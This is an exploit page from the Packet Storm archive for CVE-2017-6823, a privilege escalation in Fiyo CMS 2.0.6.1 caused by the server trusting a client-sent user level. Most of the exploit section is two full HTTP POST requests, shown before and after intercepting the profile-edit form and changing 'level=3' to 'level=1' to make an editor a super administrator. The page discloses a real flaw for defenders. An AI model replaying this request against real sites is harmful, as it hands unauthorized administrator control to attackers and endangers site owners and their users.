Twenty Year Anniversary

Fiyo CMS 2.0.6.1 Privilege Escalation

Fiyo CMS 2.0.6.1 Privilege Escalation
Posted Mar 11, 2017
Authored by rungga_reksya, dvnrcy

Fiyo CMS version 2.0.6.1 suffers from a privilege escalation vulnerability due to poor design with trusting the client to tell the server a user's role.

tags | exploit
advisories | CVE-2017-6823
MD5 | 58c65a4b3fe7279ee8cac2dae8e0e487

Fiyo CMS 2.0.6.1 Privilege Escalation

Change Mirror Download
# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
# Google Dork: no
# Date: 11-03-2017
# Exploit Author: @rungga_reksya, @dvnrcy
# Vendor Homepage: http://www.fiyo.org
# Software Link: https://sourceforge.net/projects/fiyo-cms
# Version: 2.0.6.1
# Tested on: Windows Server 2012 Datacenter Evaluation
# CVE : no

I. Background (Bahasa/Indonesian Language):
Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.

II. Description:
Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1

III. Exploit:
Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).

If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
super administrator = 1
administrator = 2
editor = 3
publisher = 4
member = 5

Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).A The first you access on menu aEdit Profilea and click aSimpan (Save)a, and then change like this on your burpsuite intercept menu:

Original:

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=


Manipulation (Change Level=3 to be Level=1):

POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.1.2
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 134

edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=

Yeaaah, now editor become super administrator privilege and The level of administrator can be super administrator too ^_^


IV. Thanks to:
- Alloh SWT
- MyBoboboy
- MII CAS
- Komunitas IT Auditor & IT Security Kaskus


Refer:
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    1 Files
  • 10
    Dec 10th
    15 Files
  • 11
    Dec 11th
    30 Files
  • 12
    Dec 12th
    25 Files
  • 13
    Dec 13th
    15 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close